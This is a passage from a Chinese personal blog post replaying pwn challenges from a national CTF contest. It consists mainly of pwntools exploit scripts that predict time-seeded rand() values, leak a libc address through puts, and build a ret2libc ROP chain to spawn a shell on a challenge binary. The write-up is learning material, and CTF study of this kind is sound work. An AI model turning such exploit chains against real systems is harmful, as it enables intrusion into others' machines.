operator">+</span>p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>binsh<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>sys<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="49"></td><td><pre>p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="50"></td><td><pre></pre></td></tr><tr><td data-num="51"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><p>但是我本地的 libc 下载来，还是打不通，真的不知道啊啊啊啊啊啊</p>
<p>能打通本地的 exp</p>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span><span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">from</span> ctypes <span class="token keyword">import</span><span class="token operator">*</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token keyword">from</span> LibcSearcher <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="4"></td><td><pre></pre></td></tr><tr><td data-num="5"></td><td><pre>context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span></pre></td></tr><tr><td data-num="7"></td><td><pre>context<span class="token punctuation">.</span>terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span><span class="token string">'splitw'</span><span class="token punctuation">,</span><span class="token string">'-h'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="8"></td><td><pre></pre></td></tr><tr><td data-num="9"></td><td><pre>local <span class="token operator">=</span> <span class="token number">2</span></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token keyword">if</span> local <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="11"></td><td><pre>    p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token keyword">else</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="13"></td><td><pre>    p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./vuln'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="14"></td><td><pre></pre></td></tr><tr><td data-num="15"></td><td><pre>libc <span class="token operator">=</span> cdll<span class="token punctuation">.</span>LoadLibrary<span class="token punctuation">(</span><span class="token string">'libc.so.6'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="16"></td><td><pre>elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./vuln'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="17"></td><td><pre></pre></td></tr><tr><td data-num="18"></td><td><pre>ret <span class="token operator">=</span> <span class="token number">0x40101a</span></pre></td></tr><tr><td data-num="19"></td><td><pre>pop_rdi <span class="token operator">=</span> <span class="token number">0x401443</span></pre></td></tr><tr><td data-num="20"></td><td><pre>puts_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="21"></td><td><pre>puts_got <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="22"></td><td><pre>main <span class="token operator">=</span> elf<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'main'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="23"></td><td><pre>gift <span class="token operator">=</span> <span class="token number">0x40125D</span></pre></td></tr><tr><td data-num="24"></td><td><pre>b <span class="token operator">=</span> libc<span class="token punctuation">.</span>srand<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="25"></td><td><pre>payload <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">14</span><span class="token punctuation">)</span><span class="token operator">+</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>p<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'name:\n'</span><span class="token punctuation">,</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre></pre></td></tr><tr><td data-num="28"></td><td><pre><span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="29"></td><td><pre>    v6 <span class="token operator">=</span> libc<span class="token punctuation">.</span>rand<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">%</span><span class="token number">100</span> <span class="token operator">+</span> <span class="token number">1</span></pre></td></tr><tr><td data-num="30"></td><td><pre>    p<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'number:\n'</span><span class="token punctuation">,</span>p32<span class="token punctuation">(</span>v6<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="31"></td><td><pre></pre></td></tr><tr><td data-num="32"></td><td><pre>p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'your gift!\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="33"></td><td><pre>payload1 <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x30</span><span class="token operator">+</span><span class="token number">0x8</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>puts_got<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>puts_plt<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>gift<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="34"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="35"></td><td><pre>puts_addr <span class="token operator">=</span> u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="36"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>puts_addr<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="37"></td><td><pre>libc <span class="token operator">=</span> LibcSearcher<span class="token punctuation">(</span><span class="token string">'puts'</span><span class="token punctuation">,</span>puts_addr<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="38"></td><td><pre>libcbase <span class="token operator">=</span> puts_addr <span class="token operator">-</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'puts'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="39"></td><td><pre>addr_system <span class="token operator">=</span> libcbase <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="40"></td><td><pre>addr_binsh <span class="token operator">=</span> libcbase <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">"str_bin_sh"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="41"></td><td><pre></pre></td></tr><tr><td data-num="42"></td><td><pre></pre></td></tr><tr><td data-num="43"></td><td><pre>payload2 <span class="token operator">=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x30</span><span class="token operator">+</span><span class="token number">0x8</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>addr_binsh<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>addr_system<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="44"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="45"></td><td><pre></pre></td></tr><tr><td data-num="46"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><p>os: 早知道 libcsearcher 能打通，谁会掉头发！！！！</p>

      <div class="tags">
          <a href="/tags/pie/" rel="tag"><i class="ic i-tag"></i> pie</a>
          <a href="/tags/got%E6%94%B9%E5%86%99/" rel="tag"><i class="ic i-tag"></i> got改写</a>
          <a href="/tags/%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%A3%80%E6%9F%A5/" rel="tag"><i class="ic i-tag"></i> 随机数检查</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-08-05 11:16:13" itemprop="dateModified" datetime="2023-08-05T11:16:13+08:00">2023-08-05</time>
  </span>
  <span id="2023/08/03/国赛复现/" class="item leancloud_visitors" data-flag-title="国赛复现" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>yhuanhuan <i class="ic i-at"><em>@</em></i>
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/" title="国赛复现">http://example.com/2023/08/03/国赛复现/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/08/02/find-flag/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;PeCrlT1WzSygfaB.png" title="find_flag">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> 复现</span>
  <h3>find_flag</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/08/03/csu/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;nUh9xrjosZA6KBg.png" title="csu">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 技巧</span>
  <h3>csu</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%BD%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text"> 国赛题复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA"><span class="toc-number">1.0.1.</span> <span class="toc-text"> 华北赛区：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#relro%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6"><span class="toc-number">1.0.2.</span> <span class="toc-text"> RELRO 保护机制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E7%A8%8B%E5%BA%8F"><span class="toc-number">1.0.2.0.1.</span> <span class="toc-text"> 检查程序</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%94%BE%E5%85%A5ida"><span class="toc-number">1.0.2.0.2.</span> <span class="toc-text"> 放入 IDA</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#exp"><span class="toc-number">1.0.2.0.3.</span> <span class="toc-text"> exp</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%8E%E4%B8%9C%E8%B5%9B%E5%8C%BA"><span class="toc-number">1.0.3.</span> <span class="toc-text"> 华东赛区：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E7%A8%8B%E5%BA%8F-2"><span class="toc-number">1.0.3.0.1.</span> <span class="toc-text"> 检查程序：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F"><span class="toc-number">1.0.3.0.2.</span> <span class="toc-text"> 执行程序：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%94%BE%E5%85%A5ida-2"><span class="toc-number">1.0.3.0.3.</span> <span class="toc-text"> 放入 IDA：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%91%E7%8E%B0%E6%BC%8F%E6%B4%9E%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.3.0.4.</span> <span class="toc-text"> 发现漏洞函数：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#exp-2"><span class="toc-number">1.0.3.0.5.</span> <span class="toc-text"> exp:</span></a></li></ol></li></ol></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2023/08/02/find-flag/" rel="bookmark" title="find_flag">find_flag</a></li><li class="active"><a href="/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/" rel="bookmark" title="国赛复现">国赛复现</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="yhuanhuan"
      data-src="/images/huanhuan.png">
  <p class="name" itemprop="name">yhuanhuan</p>
  <div class="description" itemprop="description">欢迎来到Huan的笔记空间~这里主要会记录pwn笔记🌸</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">12</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">7</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">15</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lodWFuaHVhbjAx" title="https:&#x2F;&#x2F;github.com&#x2F;yhuanhuan01"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/08/02/find-flag/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/08/03/csu/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E5%A4%8D%E7%8E%B0/" title="分类于 复现">复现</a>
</div>

    <span><a href="/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/" title="国赛复现">国赛复现</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2023/08/13/Nep-wp/" title="Nep__wp">Nep__wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2023/09/10/sictf-wp/" title="sictf_wp">sictf_wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/03/srop/" title="srop">srop</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/10/uaf/" title="uaf">uaf</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/04/b-canary/" title="b_canary">b_canary</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/11/unlink/" title="unlink">unlink</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/03/pwn1lianxi/" title="srop">srop</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E5%A4%8D%E7%8E%B0/" title="分类于 复现">复现</a>
</div>

    <span><a href="/2023/08/02/find-flag/" title="find_flag">find_flag</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/03/csu/" title="csu">csu</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">yhuanhuan @ yhuanhuan</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">75k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">1:09</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/08/03/国赛复现/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"bottom","width":150,"height":300,"hOffset":-15,"vOffset":-15},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
